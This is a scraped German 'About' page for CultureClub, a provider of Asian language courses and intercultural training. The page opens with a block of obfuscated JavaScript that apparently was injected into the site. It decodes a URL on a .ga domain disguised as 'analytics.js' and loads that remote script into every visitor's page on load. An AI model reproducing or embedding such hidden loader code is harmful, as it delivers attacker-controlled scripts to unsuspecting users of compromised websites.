var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();

About CultureClub

Home > AboutCC

CultureClub

Weiterbildung Sprachen & Kulturen Asiens

Was ist CultureClub?

CultureClub ist die richtige Adresse, wenn es um das Erlernen asiatischer Fremdsprachen und das Verstehen asiatischer Kulturen geht. Das Angebot reicht dabei von offenen Sprachkursen bis hin zu Seminaren und Workshops für Firmen, Vereine und Schulen.

Folgende Punkte geben einen groben Überblick über die Schwerpunkte unseres Angebots:

Asiatische Sprachen

Chinesisch, Hindi, Indonesisch, Japanisch, Koreanisch – CultureClub bietet innovative, professionelle Sprachkurse zum erlernen speziell asiatischer Sprachen.

CultureClub ist auf die Vermittlung asiatischer Fremdsprachen spezialisiert und versteht das Lernen von Fremdsprachen auf moderne, neuartige Weise. Das bedeutet, der eigentliche Prozess, eine Sprache zu lernen, hat wenig mit Vokabellisten zu tun und ist viel lebendiger. Anstatt von “Lehrbuchsprache” wird vielmehr versucht “echte”, lebendige Sprache zu vermitteln, so wie sie einem in der Realität auch tatsächlich begegnet.

Durch Insider- und Fachwissen sowie aufgrund von Erfahrung im Vermitteln asiatischer Sprachen, sind wir in der Lage mit Kompetenz unterschiedliche Regionen des asiatischen Kontinents für Menschen in Europa sprachlich zugänglich zu machen.

Mit Kursinhalten und Lernunterlagen, welche in mühevoller Eigenarbeit größtenteils selbst erstellt wurden und sich in ständiger Weiterentwicklung befinden, sind die Kursprogramme bei CultureClub einzigartige Angebote mit Wiedererkennungswert sowie einem inhaltlich hohen Qualitätsanspruch.

CultureClub ist ein progressiver, ideenreicher und moderner Kursanbieter, der sich nicht scheut neue Methoden auszuprobieren. Möglichst authentische Sprachkenntnisse werden auf interessante, motivierende und abwechslungsreiche Weise vermittelt. Die erworbenen Sprachkompetenzen sollen letztendlich auch in der Realität brauchbar sein und zugleich für TeilnehmerInnen mit unterschiedlichen Persönlichkeiten und Lernzielen ein Angebot sein.

Genauere Infos zu Sprachen, Sprachkursen und den Trainingsmethoden bei CultureClub sind auf der Themenseite für Sprachkurse zu finden.

Interkulturelle Kompetenzen

CultureClub bietet professionelle Weiterbildung zum Aufbau interkultureller Kompetenzen für Firmen, Vereine und Schulen zu unterschiedlichen Themen und mit einem starken Fokus auf den asiatischen Kontinent. Diese können sowohl speziell auf unterschiedliche Branchen, wie auch für verschiedene Zielgruppen ausgerichtet werden. Generell handelt es sich um individuelle, einzigartige Seminare, Workshops und Trainings, welche vor allem durch Inhaltsstärke und Neuwertigkeit begeistern. Mit einem breiten und kompetenten Wissen im Bereich Kultur, Interkulturalität und Migration steht bei CultureClub ein insgesamt sehr breites Spektrum an interkulturellen Themen zur Verfügung, welche sich ganz speziell an die jeweiligen Ziele und Bedürfnisse richten und immer in Anbetracht des jeweiligen Auftrags konzipiert werden.

Dabei gehen wir mit innovativen Inhalten und Mut zur Veränderung gedanklich neue Wege. Durch das Einbinden unterschiedlicher Perspektiven und verschiedener kognitiver Zugangsmethoden macht CultureClub das Fremde verständlich und das Eigene bewusst.

Insgesamt zielen wir auf das Durchbrechen gewohnter Denk- und Interpretationsmuster. Es geht dabei um die Erweiterung des eigenen Horizontes und um Licht in die Welt Jenseits des Tellerrandes zu bringen. Bei CultureClub werden originelle, neuartige Konzepte und Lösungswege zur Verfügung gestellt, um die großen und kleinen Herausforderungen unserer Zeit positiv zu Nutzen. Dies beginnt schon mit der Ansicht, dass wir weniger vor einer großen Herausforderung, als vielmehr vor einer großen Chance stehen.

Unsere Ziele

CultureClub sieht sich als als moderne Institution, die sich nicht nur als wirtschaftstreibende Bildungseinrichtung verseht, sondern sich vor allem in ihrem nachhaltigen Nutzen für die Gesellschaft misst. Mit unserer Arbeit möchten wir einen aktiven Beitrag zum gesellschaftlichen Wandel unserer Zeit leisten und die Herausforderungen unserer Zeit, wie Globalisierung, Migrationsgesellschaft und Digitalisierung für das schaffen einer positiven Zukunft nutzen. Neben der Vermittlung von Wissen handeln wir in unserem Wirkungsfeld für ein friedlicheres Miteinander, und treten für ein nachhaltiges Denken ein.

CultureClub im Detail

About Me
Wer hinter CultureClub steckt
Leitlinien
Unsere Grundsätze
Jobs
Aktuell ausgeschriebene Stellen
Matthias Azhari
Über CultureClub

Artikel zu CultureClub auf ProntoPro

“Eine asiatische Sprache wie etwa Chinesisch oder Indonesisch zu sprechen gilt hierzulande als sehr komplex und wird noch immer als exotisches Ausnahmetalent gesehen. Auch LehrerInnen solcher Sprachen gehören eher als Seltenheit und nur wenig Einrichtungen und Sprachschulen bieten derartige Sprachen überhaupt an. Eher spärlich fällt auch das Angebot an Lehrbüchern und anderer Literatur zu Sprachen aus Ost- und Südostasien aus…”